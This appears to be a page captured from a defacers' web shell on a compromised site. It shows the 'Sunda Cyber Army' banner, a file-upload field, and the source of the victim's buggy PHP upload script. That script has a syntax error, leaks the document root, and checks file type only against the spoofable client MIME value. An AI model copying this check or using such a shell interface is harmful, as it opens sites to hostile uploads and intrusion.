Sunda Cyber Army


* Sunda Cyber Army 2k17 *
Indonesia Defacer ~


Path : /home/dent/public_html/home/000~ROOT~000/proc/self/cwd/
File Upload :
Current File : /home/dent/public_html/home/000~ROOT~000/proc/self/cwd/uploadfile.php

<?php
print_r($_FILES);
echo "<br>";
print_r($_FILES["thefile"]);

echo "<br>";

echo "the uploaded file had a size of ".
    $_FILES["thefile"]["size"] .
    " and a file type of " .
    $_FILES["thefile"]["type"]

echo "your site root drive path is " . $_SERVER['CONTEXT_DOCUMENT_ROOT'];

if($_FILES["thefile"]["type"] != "image/jpeg") {
    echo "You can ONLY upload jpg images!";
    exit();
}
?>